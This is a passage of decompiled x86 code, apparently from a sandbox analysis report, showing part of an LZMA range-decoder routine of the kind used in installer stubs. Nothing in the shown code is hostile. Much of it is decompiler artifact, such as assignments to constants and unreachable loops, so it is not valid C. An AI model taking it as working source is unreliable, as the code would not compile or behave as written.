                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              												_t534 =  *( *(_t613 - 0x70));
                              												if(_t534 > 0xe1) {
                              													goto L171;
                              												}
                              												_t538 = _t534 & 0x000000ff;
                              												_push(0x2d);
                              												asm("cdq");
                              												_pop(_t570);
                              												_push(9);
                              												_pop(_t571);
                              												_t609 = _t538 / _t570;
                              												_t540 = _t538 % _t570 & 0x000000ff;
                              												asm("cdq");
                              												_t604 = _t540 % _t571 & 0x000000ff;
                              												 *(_t613 - 0x3c) = _t604;
                              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                              												_t612 = (0x300 << _t604 + _t609) + 0x736;
                              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                              													L10:
                              													if(_t612 == 0) {
                              														L12:
                              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              														goto L15;
                              													} else {
                              														goto L11;
                              													}
                              													do {
                              														L11:
                              														_t612 = _t612 - 1;
                              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                              													} while (_t612 != 0);
                              													goto L12;
                              												}
                              												if( *(_t613 - 4) != 0) {
                              													GlobalFree( *(_t613 - 4));
                              												}
                              												_t534 = GlobalAlloc(0x40, 0x600); // executed
                              												 *(_t613 - 4) = _t534;
                              												if(_t534 == 0) {
                              													goto L171;
                              												} else {
                              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                              													goto L10;
                              												}
                              											case 1:
                              												L13:
                              												__eflags =  *(_t613 - 0x6c);
                              												if( *(_t613 - 0x6c) == 0) {
                              													 *(_t613 - 0x88) = 1;
                              													goto L170;
                              												}
                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              												_t45 = _t613 - 0x48;
                              												 *_t45 =  *(_t613 - 0x48) + 1;
                              												__eflags =  *_t45;
                              												L15:
                              												if( *(_t613 - 0x48) < 4) {
                              													goto L13;
                              												}
                              												_t546 =  *(_t613 - 0x40);
                              												if(_t546 ==  *(_t613 - 0x74)) {
                              													L20:
                              													 *(_t613 - 0x48) = 5;
                              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                              													goto L23;
                              												}
                              												 *(_t613 - 0x74) = _t546;
                              												if( *(_t613 - 8) != 0) {
                              													GlobalFree( *(_t613 - 8));
                              												}
                              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                              												 *(_t613 - 8) = _t534;
                              												if(_t534 == 0) {
                              													goto L171;
                              												} else {
                              													goto L20;
                              												}
                              											case 2:
                              												L24:
                              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                              												 *(_t613 - 0x84) = 6;
                              												 *(_t613 - 0x4c) = _t553;
                              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                              												L132:
                              												 *(_t613 - 0x54) = _t606;
                              												goto L133;
                              											case 3:
                              												L21:
                              												__eflags =  *(_t613 - 0x6c);
                              												if( *(_t613 - 0x6c) == 0) {
                              													 *(_t613 - 0x88) = 3;
                              													goto L170;
                              												}
                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              												_t67 = _t613 - 0x70;
                              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                              												__eflags =  *_t67;
                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              												L23:
                              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                              												if( *(_t613 - 0x48) != 0) {
                              													goto L21;
                              												}
                              												goto L24;
                              											case 4:
                              												L133:
                              												_t531 =  *_t606;
                              												_t589 = _t531 & 0x0000ffff;
                              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                              												if( *(_t613 - 0xc) >= _t565) {
                              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                              													 *(_t613 - 0x40) = 1;
                              													_t532 = _t531 - (_t531 >> 5);
                              													 *_t606 = _t532;
                              												} else {
                              													 *(_t613 - 0x10) = _t565;
                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                              												}
                              												if( *(_t613 - 0x10) >= 0x1000000) {
                              													goto L139;
                              												}
                              											case 5:
                              												goto L137;
                              											case 6:
                              												__edx = 0;
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 4);
                              													__ecx =  *(__ebp - 0x38);
                              													 *(__ebp - 0x34) = 1;
                              													 *(__ebp - 0x84) = 7;
                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              													while(1) {
                              														L132:
                              														 *(_t613 - 0x54) = _t606;
                              														goto L133;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              												__esi =  *(__ebp - 0x60);
                              												__cl = 8;
                              												__cl = 8 -  *(__ebp - 0x3c);
                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              												__ecx =  *(__ebp - 0x3c);
                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              												__ecx =  *(__ebp - 4);
                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              												__eflags =  *(__ebp - 0x38) - 4;
                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              												if( *(__ebp - 0x38) >= 4) {
                              													__eflags =  *(__ebp - 0x38) - 0xa;
                              													if( *(__ebp - 0x38) >= 0xa) {
                              														_t98 = __ebp - 0x38;
                              														 *_t98 =  *(__ebp - 0x38) - 6;
                              														__eflags =  *_t98;
                              													} else {
                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              													}
                              												} else {
                              													 *(__ebp - 0x38) = 0;
                              												}
                              												__eflags =  *(__ebp - 0x34) - __edx;
                              												if( *(__ebp - 0x34) == __edx) {
                              													__ebx = 0;
                              													__ebx = 1;
                              													goto L61;
                              												} else {
                              													__eax =  *(__ebp - 0x14);
                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              													__eflags = __eax -  *(__ebp - 0x74);
                              													if(__eax >=  *(__ebp - 0x74)) {
                              														__eax = __eax +  *(__ebp - 0x74);
                              														__eflags = __eax;
                              													}
                              													__ecx =  *(__ebp - 8);
                              													__ebx = 0;
                              													__ebx = 1;
                              													__al =  *((intOrPtr*)(__eax + __ecx));
                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              													goto L41;
                              												}
                              											case 7:
                              												__eflags =  *(__ebp - 0x40) - 1;
                              												if( *(__ebp - 0x40) != 1) {
                              													__eax =  *(__ebp - 0x24);
                              													 *(__ebp - 0x80) = 0x16;
                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              													__eax =  *(__ebp - 0x28);
                              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              													__eax =  *(__ebp - 0x2c);
                              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              													__eax = 0;
                              													__eflags =  *(__ebp - 0x38) - 7;
                              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              													__al = __al & 0x000000fd;
                              													__eax = (__eflags >= 0) - 1 + 0xa;
                              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              													__eax =  *(__ebp - 4);
                              													__eax =  *(__ebp - 4) + 0x664;
                              													__eflags = __eax;
                              													 *(__ebp - 0x58) = __eax;
                              													goto L69;
                              												}
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 8;
                              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              												while(1) {
                              													L132:
                              													 *(_t613 - 0x54) = _t606;
                              													goto L133;
                              												}
                              											case 8:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 4);
                              													__ecx =  *(__ebp - 0x38);
                              													 *(__ebp - 0x84) = 0xa;
                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              												} else {
                              													__eax =  *(__ebp - 0x38);
                              													__ecx =  *(__ebp - 4);
                              													__eax =  *(__ebp - 0x38) + 0xf;
                              													 *(__ebp - 0x84) = 9;
                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              												}
                              												while(1) {
                              													L132:
                              													 *(_t613 - 0x54) = _t606;
                              													goto L133;
                              												}
                              											case 9:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													goto L89;
                              												}
                              												__eflags =  *(__ebp - 0x60);
                              												if( *(__ebp - 0x60) == 0) {
                              													goto L171;
                              												}
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                              												__eflags = _t259;
                              												0 | _t259 = _t259 + _t259 + 9;
                              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                              												goto L76;
                              											case 0xa:
                              												goto L0;
                              											case 0xb:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__ecx =  *(__ebp - 0x24);
                              													__eax =  *(__ebp - 0x20);
                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              												} else {
                              													__eax =  *(__ebp - 0x24);
                              												}
                              												__ecx =  *(__ebp - 0x28);
                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              												goto L88;
                              											case 0xc:
                              												L99:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xc;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t334 = __ebp - 0x70;
                              												 *_t334 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t334;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												__eax =  *(__ebp - 0x2c);
                              												goto L101;
                              											case 0xd:
                              												L37:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xd;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t122 = __ebp - 0x70;
                              												 *_t122 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t122;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L39:
                              												__eax =  *(__ebp - 0x40);
                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              													goto L48;
                              												}
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													goto L54;
                              												}
                              												L41:
                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              												__ecx =  *(__ebp - 0x58);
                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              												 *(__ebp - 0x48) = __eax;
                              												__eax = __eax + 1;
                              												__eax = __eax << 8;
                              												__eax = __eax + __ebx;
                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edx = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													 *(__ebp - 0x40) = 1;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													__ebx = __ebx + __ebx + 1;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edx;
                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L39;
                              												} else {
                              													goto L37;
                              												}
                              											case 0xe:
                              												L46:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xe;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t156 = __ebp - 0x70;
                              												 *_t156 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t156;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												while(1) {
                              													L48:
                              													__eflags = __ebx - 0x100;
                              													if(__ebx >= 0x100) {
                              														break;
                              													}
                              													__eax =  *(__ebp - 0x58);
                              													__edx = __ebx + __ebx;
                              													__ecx =  *(__ebp - 0x10);
                              													__esi = __edx + __eax;
                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                              													__ax =  *__esi;
                              													 *(__ebp - 0x54) = __esi;
                              													__edi = __ax & 0x0000ffff;
                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              													__eflags =  *(__ebp - 0xc) - __ecx;
                              													if( *(__ebp - 0xc) >= __ecx) {
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              														__cx = __ax;
                              														_t170 = __edx + 1; // 0x1
                              														__ebx = _t170;
                              														__cx = __ax >> 5;
                              														__eflags = __eax;
                              														 *__esi = __ax;
                              													} else {
                              														 *(__ebp - 0x10) = __ecx;
                              														0x800 = 0x800 - __edi;
                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              														__ebx = __ebx + __ebx;
                              														 *__esi = __cx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													 *(__ebp - 0x44) = __ebx;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														continue;
                              													} else {
                              														goto L46;
                              													}
                              												}
                              												L54:
                              												_t173 = __ebp - 0x34;
                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                              												__eflags =  *_t173;
                              												goto L55;
                              											case 0xf:
                              												L58:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xf;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t203 = __ebp - 0x70;
                              												 *_t203 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t203;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L60:
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													L55:
                              													__al =  *(__ebp - 0x44);
                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              													goto L56;
                              												}
                              												L61:
                              												__eax =  *(__ebp - 0x58);
                              												__edx = __ebx + __ebx;
                              												__ecx =  *(__ebp - 0x10);
                              												__esi = __edx + __eax;
                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													_t217 = __edx + 1; // 0x1
                              													__ebx = _t217;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L60;
                              												} else {
                              													goto L58;
                              												}
                              											case 0x10:
                              												L109:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0x10;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t365 = __ebp - 0x70;
                              												 *_t365 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t365;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												goto L111;
                              											case 0x11:
                              												goto L69;
                              											case 0x12:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 0x58);
                              													 *(__ebp - 0x84) = 0x13;
                              													__esi =  *(__ebp - 0x58) + 2;
                              													while(1) {
                              														L132:
                              														 *(_t613 - 0x54) = _t606;
                              														goto L133;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x4c);
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              												__ecx =  *(__ebp - 0x58);
                              												__eax =  *(__ebp - 0x4c) << 4;
                              												__eflags = __eax;
                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                              												goto L130;
                              											case 0x13:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													_t469 = __ebp - 0x58;
                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                              													__eflags =  *_t469;
                              													 *(__ebp - 0x30) = 0x10;
                              													 *(__ebp - 0x40) = 8;
                              													L144:
                              													 *(__ebp - 0x7c) = 0x14;
                              													goto L145;
                              												}
                              												__eax =  *(__ebp - 0x4c);
                              												__ecx =  *(__ebp - 0x58);
                              												__eax =  *(__ebp - 0x4c) << 4;
                              												 *(__ebp - 0x30) = 8;
                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              												L130:
                              												 *(__ebp - 0x58) = __eax;
                              												 *(__ebp - 0x40) = 3;
                              												goto L144;
                              											case 0x14:
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              												__eax =  *(__ebp - 0x80);
                              												 *(_t613 - 0x88) = _t533;
                              												goto L1;
                              											case 0x15:
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              												__al = __al & 0x000000fd;
                              												__eax = (__eflags >= 0) - 1 + 0xb;
                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              												goto L120;
                              											case 0x16:
                              												__eax =  *(__ebp - 0x30);
                              												__eflags = __eax - 4;
                              												if(__eax >= 4) {
                              													_push(3);
                              													_pop(__eax);
                              												}
                              												__ecx =  *(__ebp - 4);
                              												 *(__ebp - 0x40) = 6;
                              												__eax = __eax << 7;
                              												 *(__ebp - 0x7c) = 0x19;
                              												 *(__ebp - 0x58) = __eax;
                              												goto L145;
                              											case 0x17:
                              												L145:
                              												__eax =  *(__ebp - 0x40);
                              												 *(__ebp - 0x50) = 1;
                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              												goto L149;
                              											case 0x18:
                              												L146:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0x18;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t484 = __ebp - 0x70;
                              												 *_t484 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t484;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L148:
                              												_t487 = __ebp - 0x48;
                              												 *_t487 =  *(__ebp - 0x48) - 1;
                              												__eflags =  *_t487;
                              												L149:
                              												__eflags =  *(__ebp - 0x48);
                              												if( *(__ebp - 0x48) <= 0) {
                              													__ecx =  *(__ebp - 0x40);
                              													__ebx =  *(__ebp - 0x50);
                              													0 = 1;
                              													__eax = 1 << __cl;
                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              													__eax =  *(__ebp - 0x7c);
                              													 *(__ebp - 0x44) = __ebx;
                              													while(1) {
                              														 *(_t613 - 0x88) = _t533;
                              														goto L1;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x50);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              												__eax =  *(__ebp - 0x58);
                              												__esi = __edx + __eax;
                              												 *(__ebp - 0x54) = __esi;
                              												__ax =  *__esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													__cx = __ax >> 5;
                              													__eax = __eax - __ecx;
                              													__edx = __edx + 1;
                              													__eflags = __edx;
                              													 *__esi = __ax;
                              													 *(__ebp - 0x50) = __edx;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L148;
                              												} else {
                              													goto L146;
                              												}
                              											case 0x19:
                              												__eflags = __ebx - 4;
                              												if(__ebx < 4) {
                              													 *(__ebp - 0x2c) = __ebx;
                              													L119:
                              													_t393 = __ebp - 0x2c;
                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                              													__eflags =  *_t393;
                              													L120:
                              													__eax =  *(__ebp - 0x2c);
                              													__eflags = __eax;
                              													if(__eax == 0) {
                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              														goto L170;
                              													}
                              													__eflags = __eax -  *(__ebp - 0x60);
                              													if(__eax >  *(__ebp - 0x60)) {
                              														goto L171;
                              													}
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              													__eax =  *(__ebp - 0x30);
                              													_t400 = __ebp - 0x60;
                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              													__eflags =  *_t400;
                              													goto L123;
                              												}
                              												__ecx = __ebx;
                              												__eax = __ebx;
                              												__ecx = __ebx >> 1;
                              												__eax = __ebx & 0x00000001;
                              												__ecx = (__ebx >> 1) - 1;
                              												__al = __al | 0x00000002;
                              												__eax = (__ebx & 0x00000001) << __cl;
                              												__eflags = __ebx - 0xe;
                              												 *(__ebp - 0x2c) = __eax;
                              												if(__ebx >= 0xe) {
                              													__ebx = 0;
                              													 *(__ebp - 0x48) = __ecx;
                              													L102:
                              													__eflags =  *(__ebp - 0x48);
                              													if( *(__ebp - 0x48) <= 0) {
                              														__eax = __eax + __ebx;
                              														 *(__ebp - 0x40) = 4;
                              														 *(__ebp - 0x2c) = __eax;
                              														__eax =  *(__ebp - 4);
                              														__eax =  *(__ebp - 4) + 0x644;
                              														__eflags = __eax;
                              														L108:
                              														__ebx = 0;
                              														 *(__ebp - 0x58) = __eax;
                              														 *(__ebp - 0x50) = 1;
                              														 *(__ebp - 0x44) = 0;
                              														 *(__ebp - 0x48) = 0;
                              														L112:
                              														__eax =  *(__ebp - 0x40);
                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              															_t391 = __ebp - 0x2c;
                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              															__eflags =  *_t391;
                              															goto L119;
                              														}
                              														__eax =  *(__ebp - 0x50);
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              														__eax =  *(__ebp - 0x58);
                              														__esi = __edi + __eax;
                              														 *(__ebp - 0x54) = __esi;
                              														__ax =  *__esi;
                              														__ecx = __ax & 0x0000ffff;
                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              														__eflags =  *(__ebp - 0xc) - __edx;
                              														if( *(__ebp - 0xc) >= __edx) {
                              															__ecx = 0;
                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              															__ecx = 1;
